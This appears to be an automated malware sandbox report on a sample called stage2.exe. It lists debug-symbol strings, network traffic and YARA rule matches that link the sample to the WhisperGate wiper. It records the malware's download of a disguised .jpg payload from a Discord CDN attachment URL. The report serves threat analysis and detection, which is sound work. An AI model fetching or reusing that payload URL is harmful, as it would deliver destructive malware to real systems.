    Source: Binary string: mscorlib.pdb source: stage2.exe, 00000001.00000002.481938339.0000000006684000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: secur32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdbRSDSD source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: (P}k0C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbW source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.ni.pdbT3Mn source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp
    Source: Binary string: .pdb! source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb6 source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: fwpuclnt.pdb& id7 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscorlib.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdbF source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasman.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: wUxTheme.pdb4Shd source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: rasadhlp.pdbh source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winhttp.pdb\ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: version.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb+3 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Xml.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: psapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: gpapi.pdb2 ]dd source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp
    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc.pdbn source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wuser32.pdb>Srdn source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: combase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: rsaenh.pdb@ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: arkjrukCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.477704320.00000000006E2000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: edputil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb< gd> source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp

    Networking:

    barindex
    Yara detected MSILDownloaderGenericShow sources
    Source: Yara matchFile source: Process Memory Space: stage2.exe PID: 7084, type: MEMORYSTR
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: global trafficHTTP traffic detected: GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
    Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 17 Jan 2022 01:25:24 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 223Connection: closeCF-Ray: 6cebca1adc534a68-FRACache-Control: private, max-age=0Expires: Mon, 17 Jan 2022 01:25:24 GMTVary: Accept-EncodingCF-Cache-Status: MISSAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"X-GUploader-UploadID: ADPycds5oM3NpZ9AylXZpGVOB9ntKzX9oHiZ36JltKQWVbDwXaSj4icPcReICi5s5vNaRHT4QvI_mIj3uwpfm47zzoOikFzaRAX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RfbSACd0FpP8AarT40rUdyTU16oiVuL8ktNluhrU0TLjW%2BTGsBj6c0zZg%2FW2Tg%2BHLybyYjE0%2BAX8GvswXYherK%2BwZycY1622%2BqIiXLXq84wLdlCovP450WnSVpVht58ekJr99w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
    Source: stage2.exe, 00000001.00000000.438989759.000000000337A000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com
    Source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.339502555.0000000000FB3000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.426449347.0000000000DCD000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.475719266.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479105876.0000000004B86000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 0000000D.00000002.432860821.0000000009220000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png$
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
    Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.340839036.0000000004DC1000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427485435.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
    Source: Amcache.hve.26.drString found in binary or memory: http://upx.sf.net
    Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html$
    Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
    Source: stage2.exeString found in binary or memory: https://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg
    Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com4
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester$
    Source: powershell.exe, 00000002.00000002.341684839.0000000005150000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.429277847.0000000004FA7000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: WerFault.exe, 0000001A.00000002.478119853.0000000000DAA000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemetry)
    Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
    Source: global trafficHTTP traffic detected: GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2

    System Summary:

    barindex
    Source: stage2.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
    Source: stage2.exe, type: SAMPLEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: stage2.exe, type: SAMPLEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: stage2.exe, type: SAMPLEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
